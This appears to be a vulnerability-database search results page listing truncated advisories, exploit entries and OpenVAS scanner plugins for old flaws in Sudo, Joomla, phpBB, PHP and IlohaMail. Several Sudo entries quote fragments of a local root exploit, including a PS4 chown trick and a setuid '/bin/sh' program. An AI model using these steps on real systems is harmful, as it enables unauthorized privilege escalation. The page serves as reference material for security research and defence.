Mambo Open Source / Joomla! GLOBALS Variable Remote File Include

The version of Mambo Open Source or Joomla! running on the remote host is affected by a remote file include vulnerability due to allowing the the GLOBALS variable array to be overwritten whenever the PHP 'registerglobals' setting is disabled. An unauthenticated, remote attacker can exploit this...

PEEL 2.x sql injection

PEEL 2.x sql injection Author: r0t hackers.by.lv Date: 14. nov 2005 software: PEEL 2.x vendor: http://peel.fr/ Tested on 2.6 and 2.7 version Vulnerability Description: contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'index.php' script...

Sudo Perl 1.6.x - Environment Variable Handling Security Bypass

source: https://www.securityfocus.com/bid/15394/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling the 'PERLLIB', 'PERL5LIB', and 'PERL5OPT' environment variables when tainting is ignore...

Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit

No description provided by source. Sudo local root escalation privilege vuln versions : sudo 1.6.8p10 by breno You need sudo access execution for some bash script Use csh shell to change SHELLOPTS env ie: %cat x.sh !/bin/bash -x echo "Getting root!!" % cat /etc/sudoers ... breno ALL=ALL...

Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation

Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! % ls -lisa egg 1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 eg...

Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation

Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! %...

Operator Shell (osh) 1.7-14 Local Root Exploit

No description provided by source. !/bin/sh OSH 1.7-14 Exploit EDUCATIONAL purposes only.... :- by Charles Stevenson core [email protected] Description: The Operator Shell Osh is a setuid root, security enhanced, restricted shell. It allows the administrator to carefully limit the access of special...

TelCondex Simple Webserver Buffer Overflow

The TelCondex SimpleWebserver is vulnerable to a remote executable buffer overflow, due to missing length check on the referer-variable of the HTTP-header. OpenVAS Vulnerability Test $Id: telcondex.nasl 6063 2017-05-03 09:03:05Z teissa $ Description: TelCondex Simple Webserver Buffer Overflow...

IlohaMail Arbitrary File Access via Session Variable Vulnerability

The target is running at least one instance of IlohaMail version 0.7.11 or earlier. Such versions contain a flaw in the processing of the session variable that allows an unauthenticated attacker to retrieve arbitrary files available to the web user, provided the filesystem backend is in use...

Generic HTTP SQLi (Web Application) - Active Check

This script attempts to use SQL injection SQLi techniques on CGI / web application scripts. SPDX-FileCopyrightText: 2002 John Lampe Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

Global variable settings

This plugin configures miscellaneous global variables for NASL scripts. It does not perform any security check but may disable or change the behaviour of others. SPDX-FileCopyrightText: 2005 Michel Arboi SPDX-FileCopyrightText: New code / functionality since 2009 Greenbone AG Some text descriptio...

bizdb1-search.cgi located

One of the BizDB scripts, bizdb-search.cgi, passes a variable SPDX-FileCopyrightText: 2000 Roelof Temmingh Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

IlohaMail Arbitrary File Access via Session Variable Vulnerability

The target is running at least one instance of IlohaMail version 0.7.11 or earlier. Such versions contain a flaw in the processing of the session variable that allows an unauthenticated attacker to retrieve arbitrary files available to the web user, provided the filesystem backend is in use...

IlohaMail Arbitrary File Access via Language Variable

The target is running at least one instance of IlohaMail version 0.7.10 or earlier. Such versions contain a flaw in the processing of the language variable that allows an unauthenticated attacker to retrieve arbitrary files available to the web user. OpenVAS Vulnerability Test $Id:...

IlohaMail Arbitrary File Access via Language Variable

The target is running at least one instance of IlohaMail version 0.7.10 or earlier. Such versions contain a flaw in the processing of the language variable that allows an unauthenticated attacker to retrieve arbitrary files available to the web user. SPDX-FileCopyrightText: 2004-2005 George A...

CVE-2005-3415

phpBB 2.0.17 and earlier allows remote attackers to bypass protection mechanisms that deregister global variables by setting both a GET/POST/COOKIE GPC variable and a GLOBALS variable with the same name, which causes phpBB to unset the GLOBALS variable but not the GPC variable...

CVE-2005-3415

phpBB 2.0.17 and earlier allows remote attackers to bypass protection mechanisms that deregister global variables by setting both a GET/POST/COOKIE GPC variable and a GLOBALS variable with the same name, which causes phpBB to unset the GLOBALS variable but not the GPC variable...

Variable-length Fnstenv/mov Dword XOR Encoder

This encoder uses a variable-length mov equivalent instruction with fnstenv for getip. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Variable-length Fnstenv/mov Dword XOR Encoder',...

PHP 4.x < 4.4.0 / 5.x < 5.0.6 GLOBAL Variable Overwrite

Binary data 3273.prm...

PHP 4.x/5.0.x - Arbitrary File Upload GLOBAL Variable Overwrite

source: https://www.securityfocus.com/bid/15250/info PHP is prone to a vulnerability that allows attackers to overwrite the GLOBAL variable via HTTP POST requests. By exploiting this issue, remote attackers may be able to overwrite the GLOBAL variable. This may allow attackers to further exploit...